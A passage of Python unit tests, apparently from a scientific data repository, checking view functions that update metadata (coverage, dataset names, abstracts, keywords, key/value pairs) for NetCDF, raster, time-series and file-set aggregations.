# here we are testing 'add_metadata_element' view function for updating metadata
# for netcdf aggregation
self.create_composite_resource(file_to_upload=self.netcdf_file)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDF File type
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
# there should be temporal coverage for the netcdf file type
self.assertNotEqual(logical_file.metadata.temporal_coverage, None)
temporal_coverage = logical_file.metadata.temporal_coverage
self.assertEqual(temporal_coverage.value['start'], '2009-10-01 00:00:00')
self.assertEqual(temporal_coverage.value['end'], '2010-05-30 23:00:00')
url_params = {'hs_file_type': 'NetCDFLogicalFile',
'file_type_id': logical_file.id,
'element_name': 'coverage',
'element_id': logical_file.metadata.temporal_coverage.id
}
# test updating temporal coverage
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data={'start': '1/1/2011', 'end': '12/12/2016'})
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id, element_name='coverage',
element_id=logical_file.metadata.temporal_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
temporal_coverage = logical_file.metadata.temporal_coverage
self.assertEqual(temporal_coverage.value['start'], '2011-01-01')
self.assertEqual(temporal_coverage.value['end'], '2016-12-12')
# test updating OriginalCoverage element
# there should be original coverage for the netcdf file type
self.assertNotEqual(logical_file.metadata.original_coverage, None)
orig_coverage = logical_file.metadata.original_coverage
self.assertEqual(float(orig_coverage.value['northlimit']), 4.63515e+06)
coverage_data = {'northlimit': 111.333, 'southlimit': 42.678, 'eastlimit': 123.789,
'westlimit': 40.789, 'units': 'meters'}
url_params['element_name'] = 'originalcoverage'
url_params['element_id'] = logical_file.metadata.original_coverage.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data=coverage_data)
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id,
element_name='originalcoverage',
element_id=logical_file.metadata.original_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
orig_coverage = logical_file.metadata.original_coverage
self.assertEqual(float(orig_coverage.value['northlimit']), 111.333)
# test updating spatial coverage
# there should be spatial coverage for the netcdf file type
self.assertNotEqual(logical_file.metadata.spatial_coverage, None)
spatial_coverage = logical_file.metadata.spatial_coverage
self.assertEqual(float(spatial_coverage.value['northlimit']), 41.867126409)
coverage_data = {'type': 'box', 'projection': 'WGS 84 EPSG:4326', 'northlimit': 41.87,
'southlimit': 41.863,
'eastlimit': -111.505,
'westlimit': -111.511, 'units': 'meters'}
url_params['element_name'] = 'coverage'
url_params['element_id'] = spatial_coverage.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data=coverage_data)
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id,
element_name='coverage',
element_id=spatial_coverage.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
spatial_coverage = logical_file.metadata.spatial_coverage
self.assertEqual(float(spatial_coverage.value['northlimit']), 41.87)
# test update Variable element
variable = logical_file.metadata.variables.first()
variable_data = {'name': 'variable_name_updated', 'type': 'Int', 'unit': 'deg F',
'shape': 'variable_shape'}
url_params['element_name'] = 'variable'
url_params['element_id'] = variable.id
url = reverse('update_file_metadata', kwargs=url_params)
request = self.factory.post(url, data=variable_data)
request.user = self.user
# this is the view function we are testing
response = update_metadata_element(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id,
element_name='variable',
element_id=variable.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
variable = logical_file.metadata.variables.all().filter(id=variable.id).first()
self.assertEqual(variable.name, 'variable_name_updated')
self.composite_resource.delete()
def test_update_dataset_name_single_file_aggregation(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for single file aggregation
self.create_composite_resource(file_to_upload=self.raster_file)
res_file = self.composite_resource.files.first()
# set the tif file to GeoRasterFile type
GenericLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
self._test_update_dataset_name_aggregation(file_type="GenericLogicalFile",
dataset_name="Updated dataset name for "
"single file aggregation")
def test_update_dataset_name_raster_aggregation(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for raster aggregation
self.create_composite_resource(file_to_upload=self.raster_file)
res_file = self.composite_resource.files.first()
# set the tif file to GeoRasterFile type
GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
self._test_update_dataset_name_aggregation(file_type="GeoRasterLogicalFile",
dataset_name="Updated dataset name for "
"Geo Raster aggregation")
def test_update_dataset_name_netcdf_aggregation(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for necdf aggregation
self.create_composite_resource(file_to_upload=self.netcdf_file)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDF File type
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
self._test_update_dataset_name_aggregation(file_type="NetCDFLogicalFile",
dataset_name="Updated dataset name for "
"NetCDF aggregation")
def test_update_dataset_name_file_set_aggregation(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for file set aggregation
self.create_composite_resource()
new_folder = 'fileset_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the text file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
# set the folder to file set aggregation
FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=new_folder)
self._test_update_dataset_name_aggregation(file_type="FileSetLogicalFile",
dataset_name="Updated dataset name for "
"File Set aggregation")
def _test_update_dataset_name_aggregation(self, file_type, dataset_name):
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, file_type)
# check dataset_name before updating via the view function
self.assertNotEqual(logical_file.dataset_name, dataset_name)
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id
}
url = reverse('update_filetype_datatset_name', kwargs=url_params)
request = self.factory.post(url, data={'dataset_name': dataset_name})
request.user = self.user
# this is the view function we are testing
response = update_dataset_name(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check dataset_name after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(logical_file.dataset_name, dataset_name)
self.composite_resource.delete()
def test_update_dataset_name_refts_aggregation_failure(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for reftimeseries aggregation
# we should not be able to update dataset name since the json file
# has the title element
self.create_composite_resource(file_to_upload=self.refts_file)
res_file = self.composite_resource.files.first()
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
# check dataset_name before updating via the view function
orig_dataset_name = "Sites, Variable"
self.assertEqual(logical_file.dataset_name, orig_dataset_name)
url_params = {'hs_file_type': 'RefTimeseriesLogicalFile',
'file_type_id': logical_file.id
}
url = reverse('update_filetype_datatset_name', kwargs=url_params)
dataset_name = "Multiple sites with one variable"
request = self.factory.post(url, data={'dataset_name': dataset_name})
request.user = self.user
# this is the view function we are testing
response = update_dataset_name(request, hs_file_type="RefTimeseriesLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('error', response_dict['status'])
# check dataset_name after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# dataset name should not have changed
self.assertNotEqual(logical_file.dataset_name, dataset_name)
self.assertEqual(logical_file.dataset_name, orig_dataset_name)
self.composite_resource.delete()
def test_update_dataset_name_refts_aggregation_success(self):
# here we are testing 'update_dataset_name' view function for updating dataset name
# for reftimeseries aggregation
# we should be able to update dataset name since the json file
# does not have a value for the title element
self.create_composite_resource(file_to_upload=self.refts_missing_title_file)
res_file = self.composite_resource.files.first()
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertFalse(logical_file.metadata.has_title_in_json)
self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
# check dataset_name before updating via the view function
self.assertEqual(logical_file.dataset_name, None)
url_params = {'hs_file_type': 'RefTimeseriesLogicalFile',
'file_type_id': logical_file.id
}
url = reverse('update_filetype_datatset_name', kwargs=url_params)
dataset_name = "Multiple sites with one variable"
request = self.factory.post(url, data={'dataset_name': dataset_name})
request.user = self.user
# this is the view function we are testing
response = update_dataset_name(request, hs_file_type="RefTimeseriesLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check dataset_name after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# dataset name should have been changed
self.assertEqual(logical_file.dataset_name, dataset_name)
self.composite_resource.delete()
def test_update_abstract_refts_aggregation_failure(self):
# here we are testing the view function 'update_refts_abstract'
# we should not be able to update abstract since the json file
# has the abstract element
self.create_composite_resource(file_to_upload=self.refts_file)
res_file = self.composite_resource.files.first()
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
# test that the abstract key is in json file
self.assertTrue(logical_file.metadata.has_abstract_in_json)
# check abstract before updating via the view function
orig_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria), " \
"phycocyanin data collected from 2016-04-06 to 2017-02-09 created on " \
"Thu Apr 06 2017 09:15:56 GMT-0600 (Mountain Daylight Time) from the " \
"following site(s): HOBBLE CREEK AT 1650 WEST AT SPRINGVILLE, UTAH, and " \
"Provo River at Charleston Advanced Aquatic. Data created by " \
"CUAHSI HydroClient: http://data.cuahsi.org/#."
self.assertEqual(logical_file.metadata.abstract, orig_abstract)
url_params = {'file_type_id': logical_file.id}
url = reverse('update_reftimeseries_abstract', kwargs=url_params)
new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
request = self.factory.post(url, data={'abstract': new_abstract})
request.user = self.user
# this is the view function we are testing
response = update_refts_abstract(request, file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('error', response_dict['status'])
# check abstract after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# abstract should not have changed
self.assertNotEqual(logical_file.metadata.abstract, new_abstract)
self.assertEqual(logical_file.metadata.abstract, orig_abstract)
self.composite_resource.delete()
def test_update_abstract_refts_aggregation_success(self):
# here we are testing the view function 'update_refts_abstract'
# we should be able to update abstract since the json file
# does't have a value for the abstract element
refts_missing_abstract_file_name = 'refts_valid_abstract_null.refts.json'
refts_missing_abstract_file = 'hs_file_types/tests/{}'.format(
refts_missing_abstract_file_name)
self.create_composite_resource(file_to_upload=refts_missing_abstract_file)
res_file = self.composite_resource.files.first()
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "RefTimeseriesLogicalFile")
# test that the abstract key is not in json file
self.assertFalse(logical_file.metadata.has_abstract_in_json)
self.assertEqual(logical_file.metadata.abstract, None)
url_params = {'file_type_id': logical_file.id}
url = reverse('update_reftimeseries_abstract', kwargs=url_params)
new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
request = self.factory.post(url, data={'abstract': new_abstract})
request.user = self.user
# this is the view function we are testing
response = update_refts_abstract(request, file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check abstract after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# abstract should have changed
self.assertEqual(logical_file.metadata.abstract, new_abstract)
self.composite_resource.delete()
def test_update_abstract_timeseries_aggregation(self):
# here we are testing the view function 'update_timeseries_abstract'
# we should be able to update abstract for time series file type
# does't have the abstract element
self.create_composite_resource(file_to_upload=self.sqlite_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the sqlite file to TimeSeries file type
TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
url_params = {'file_type_id': logical_file.id}
url = reverse('update_timeseries_abstract', kwargs=url_params)
new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
request = self.factory.post(url, data={'abstract': new_abstract})
request.user = self.user
# this is the view function we are testing
response = update_timeseries_abstract(request, file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check abstract after updating via the view function
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# abstract should have changed
self.assertEqual(logical_file.metadata.abstract, new_abstract)
self.composite_resource.delete()
def test_get_timeseries_aggregation_metadata(self):
# here we are testing the view function 'get_timeseries_metadata'
# we should be able to update abstract for time series file type
# that does't have the abstract element
self.create_composite_resource(file_to_upload=self.sqlite_file)
self.assertEqual(self.composite_resource.files.all().count(), 1)
res_file = self.composite_resource.files.first()
# set the sqlite file to TimeSeries file type
TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "TimeSeriesLogicalFile")
series_id = logical_file.metadata.sites.first().series_ids[0]
url_params = {'file_type_id': logical_file.id, 'series_id': series_id,
'resource_mode': 'edit'}
url = reverse('get_timeseries_file_metadata', kwargs=url_params)
new_abstract = "Discharge, cubic feet per second,Blue-green algae (cyanobacteria)"
request = self.factory.post(url, data={'abstract': new_abstract})
request.user = self.user
# this is the view function we are testing
response = get_timeseries_metadata(request, file_type_id=logical_file.id,
series_id=series_id, resource_mode='edit')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
self.composite_resource.delete()
def test_add_delete_keywords_refts_aggregation_failure(self):
# here we are testing the view function 'add_keyword_metadata'
# we should not be able to add/delete keywords since the json file
# has the keywords element
self.create_composite_resource(file_to_upload=self.refts_file)
res_file = self.composite_resource.files.first()
file_type = 'RefTimeseriesLogicalFile'
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, file_type)
# test that the keywords key is in json file
self.assertTrue(logical_file.metadata.has_keywords_in_json)
# check keywords before adding via the view function
for kw in ('Time Series', 'CUAHSI'):
self.assertIn(kw, logical_file.metadata.keywords)
# add keywords at the file level
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id
}
url = reverse('add_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
request.user = self.user
# this is the view function we are testing
response = add_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('error', response_dict['status'])
self.assertEqual(len(logical_file.metadata.keywords), 2)
# check keywords after adding via the view function- should not have changed
for kw in ('Time Series', 'CUAHSI'):
self.assertIn(kw, logical_file.metadata.keywords)
# delete keyword
url = reverse('delete_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keyword': 'CUAHSI'})
request.user = self.user
# this is the view function we are testing
response = delete_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('error', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(len(logical_file.metadata.keywords), 2)
# check keywords after deleting via the view function- should not have changed
for kw in ('Time Series', 'CUAHSI'):
self.assertIn(kw, logical_file.metadata.keywords)
self.composite_resource.delete()
def test_add_delete_keywords_refts_aggregation_success(self):
# here we are testing the view function 'add_keyword_metadata'
# we should be able to add/delete keywords since the json file
# does not have a value for the keyWords element
refts_missing_keywords_file_name = 'refts_valid_keywords_missing.refts.json'
refts_missing_keywords_file = 'hs_file_types/tests/{}'.format(
refts_missing_keywords_file_name)
self.create_composite_resource(file_to_upload=refts_missing_keywords_file)
res_file = self.composite_resource.files.first()
file_type = 'RefTimeseriesLogicalFile'
# set the json file to RefTimeSeries File type
RefTimeseriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id,)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, file_type)
# test that the keywords key is not in json file
self.assertFalse(logical_file.metadata.has_keywords_in_json)
self.assertEqual(len(logical_file.metadata.keywords), 0)
# add keywords at the file level
url_params = {'hs_file_type': file_type,
'file_type_id': logical_file.id
}
url = reverse('add_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keywords': 'keyword-1,keyword-2'})
request.user = self.user
# this is the view function we are testing
response = add_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check keywords after adding via the view function- should have keywords now
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(len(logical_file.metadata.keywords), 2)
for kw in ('keyword-1', 'keyword-2'):
self.assertIn(kw, logical_file.metadata.keywords)
# delete keyword
url = reverse('delete_file_keyword_metadata', kwargs=url_params)
request = self.factory.post(url, data={'keyword': 'keyword-1'})
request.user = self.user
# this is the view function we are testing
response = delete_keyword_metadata(request, hs_file_type=file_type,
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# check keywords after deleting via the view function- one keyword should have been deleted
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(len(logical_file.metadata.keywords), 1)
self.assertIn('keyword-2', logical_file.metadata.keywords)
self.composite_resource.delete()
def test_CRUD_key_value_metadata_raster_aggregation(self):
# here we are testing the view function 'update_key_value_metadata'
self.create_composite_resource(file_to_upload=self.raster_file)
res_file = self.composite_resource.files.first()
# set the tif file to GeoRasterFile type
GeoRasterLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "GeoRasterLogicalFile")
# no key/value metadata for the raster file type yet
self.assertEqual(logical_file.metadata.extra_metadata, {})
url_params = {'hs_file_type': 'GeoRasterLogicalFile',
'file_type_id': logical_file.id
}
url = reverse('update_file_keyvalue_metadata', kwargs=url_params)
request = self.factory.post(url, data={'key': 'key-1', 'value': 'value-1'})
request.user = self.user
# this is the view function we are testing
response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# there should be key/value metadata for the raster file type yet
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertNotEqual(logical_file.metadata.extra_metadata, {})
self.assertEqual(logical_file.metadata.extra_metadata['key-1'], 'value-1')
# update existing key value metadata - updating both key and value
request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-2',
'key_original': 'key-1'})
request.user = self.user
response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-2')
self.assertNotIn('key-1', logical_file.metadata.extra_metadata.keys())
# update existing key value metadata - updating value only
request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-1',
'key_original': 'key-2'})
request.user = self.user
response = update_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-1')
# delete key/value data using the view function
request = self.factory.post(url, data={'key': 'key-2'})
request.user = self.user
# this the view function we are testing
response = delete_key_value_metadata(request, hs_file_type="GeoRasterLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# at this point there should not be any key/value metadata
self.assertEqual(logical_file.metadata.extra_metadata, {})
self.composite_resource.delete()
def test_CRUD_key_value_metadata_netcdf_aggregation(self):
# here we are testing the view function 'update_key_value_metadata'
self.create_composite_resource(file_to_upload=self.netcdf_file)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDF file type
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
# no key/value metadata for the netcdf file type yet
self.assertEqual(logical_file.metadata.extra_metadata, {})
url_params = {'hs_file_type': 'NetCDFLogicalFile',
'file_type_id': logical_file.id
}
url = reverse('update_file_keyvalue_metadata', kwargs=url_params)
request = self.factory.post(url, data={'key': 'key-1', 'value': 'value-1'})
request.user = self.user
# this is the view function we are testing
response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# there should be key/value metadata for the raster file type yet
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertNotEqual(logical_file.metadata.extra_metadata, {})
self.assertEqual(logical_file.metadata.extra_metadata['key-1'], 'value-1')
# update existing key value metadata - updating both key and value
request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-2',
'key_original': 'key-1'})
request.user = self.user
response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-2')
self.assertNotIn('key-1', logical_file.metadata.extra_metadata.keys())
# update existing key value metadata - updating value only
request = self.factory.post(url, data={'key': 'key-2', 'value': 'value-1',
'key_original': 'key-2'})
request.user = self.user
response = update_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(logical_file.metadata.extra_metadata['key-2'], 'value-1')
# delete key/value data using the view function
request = self.factory.post(url, data={'key': 'key-2'})
request.user = self.user
# this the view function we are testing
response = delete_key_value_metadata(request, hs_file_type="NetCDFLogicalFile",
file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
# at this point there should not be any key/value metadata
self.assertEqual(logical_file.metadata.extra_metadata, {})
self.composite_resource.delete()
def test_add_delete_keywords_aggregations(self):
# test adding and deleting of keywords - testing the view functions: 'add_keyword_metadata'
# and 'delete_keyword_metadata'
# test for raster aggregation
self._add_delete_keywords_file_type(self.raster_file, 'GeoRasterLogicalFile')
# test for netcdf aggregation
self._add_delete_keywords_file_type(self.netcdf_file, 'NetCDFLogicalFile')
def test_update_netcdf_file_for_aggregation(self):
# here we are testing the view function 'update_netcdf_file'
self.create_composite_resource(file_to_upload=self.netcdf_file)
res_file = self.composite_resource.files.first()
# set the nc file to NetCDF file type
NetCDFLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
self.assertEqual(res_file.logical_file_type_name, "NetCDFLogicalFile")
# one keyword metadata for the netcdf file type
self.assertEqual(len(logical_file.metadata.keywords), 1)
nc_dump_res_file = None
for f in logical_file.files.all():
if f.extension == ".txt":
nc_dump_res_file = f
break
self.assertNotEqual(nc_dump_res_file, None)
self.assertIn('keywords = "Snow water equivalent"', nc_dump_res_file.resource_file.read())
logical_file.metadata.keywords = ["keyword-1", 'keyword-2']
logical_file.metadata.save()
url_params = {'file_type_id': logical_file.id}
url = reverse('update_netcdf_file', kwargs=url_params)
request = self.factory.post(url, data={})
request.user = self.user
# this is the view function we are testing
response = update_netcdf_file(request, file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# ncdump file gets regenerated as part of the netcdf file update
for f in logical_file.files.all():
if f.extension == ".txt":
nc_dump_res_file = f
break
self.assertNotEqual(nc_dump_res_file, None)
self.assertIn('keywords = "keyword-1, keyword-2"', nc_dump_res_file.resource_file.read())
self.composite_resource.delete()
def test_update_sqlite_file_for_aggregation(self):
# here we are testing the view function 'update_sqlite_file' to update the sqlite file that
# is part of a timeseries aggregation
self.create_composite_resource(file_to_upload=self.sqlite_file)
res_file = self.composite_resource.files.first()
# set the sqlite file to TimeSeries file type
TimeSeriesLogicalFile.set_file_type(self.composite_resource, self.user, res_file.id)
res_file = self.composite_resource.files.first()
logical_file = res_file.logical_file
logical_file.metadata.abstract = "new abstract for time series file type"
logical_file.metadata.is_dirty = True
logical_file.metadata.save()
url_params = {'file_type_id': logical_file.id}
url = reverse('update_sqlite_file', kwargs=url_params)
request = self.factory.post(url, data={})
request.user = self.user
# this is the view function we are testing
response = update_sqlite_file(request, file_type_id=logical_file.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
self.composite_resource.delete()
def test_update_file_set_coverage_from_contents(self):
"""Here we are testing file set temporal and spatial coverage update using respective
coverage data from the contained aggregations"""
self.create_composite_resource()
new_folder = 'fileset_folder'
ResourceFile.create_folder(self.composite_resource, new_folder)
# add the the text file to the resource at the above folder
self.add_file_to_resource(file_to_add=self.text_file, upload_folder=new_folder)
# set the folder to file set aggregation
FileSetLogicalFile.set_file_type(self.composite_resource, self.user, folder_path=new_folder)
fs_aggr = FileSetLogicalFile.objects.first()
# fileset aggregation should not have any temporal coverage or
# spatial coverage at this point
self.assertEqual(fs_aggr.metadata.temporal_coverage, None)
self.assertEqual(fs_aggr.metadata.spatial_coverage, None)
# create temporal coverage for file set
value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'}
fs_aggr.metadata.create_element('coverage', type='period', value=value_dict)
# fileset aggregation should have temporal coverage at this point
self.assertNotEqual(fs_aggr.metadata.temporal_coverage, None)
# create spatial coverage for file set
value_dict = {'east': '56.45678', 'north': '12.6789', 'units': 'Decimal degree'}
fs_aggr.metadata.create_element('coverage', type='point', value=value_dict)
# fileset aggregation should have spatial coverage at this point
self.assertNotEqual(fs_aggr.metadata.spatial_coverage, None)
fs_aggr_path = fs_aggr.aggregation_name
self.assertEqual(NetCDFLogicalFile.objects.count(), 0)
# upload a netcdf file to the new_folder - folder that represents the above fileset
# aggregation
self.add_files_to_resource(files_to_add=[self.netcdf_file], upload_folder=fs_aggr_path)
# netcdf child aggregation should have been created
self.assertEqual(NetCDFLogicalFile.objects.count(), 1)
nc_aggr = NetCDFLogicalFile.objects.first()
self.assertTrue(nc_aggr.has_parent)
# netcdf aggregation should have temporal coverage
self.assertNotEqual(nc_aggr.metadata.temporal_coverage, None)
# temporal coverage of the fileset aggregation should NOT match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
self.assertNotEqual(fs_aggr.metadata.temporal_coverage.value[temp_date],
nc_aggr.metadata.temporal_coverage.value[temp_date])
# update file set aggregation temporal coverage from it's contained aggregation
url_params = {'file_type_id': fs_aggr.id,
'coverage_type': 'temporal'
}
url = reverse('update_fileset_coverage', kwargs=url_params)
request = self.factory.post(url)
request.user = self.user
# this is the view function we are testing for updating file set temporal coverage
response = update_aggregation_coverage(request, file_type_id=fs_aggr.id,
coverage_type='temporal')
self.assertEqual(response.status_code, status.HTTP_200_OK)
response_dict = json.loads(response.content)
self.assertEqual('success', response_dict['status'])
# temporal coverage of the fileset aggregation should now match with that of the contained
# netcdf aggregation
for temp_date in ('start', 'end'):
self.assertEqual(fs_aggr.metadata.temporal_coverage.value[temp_date],
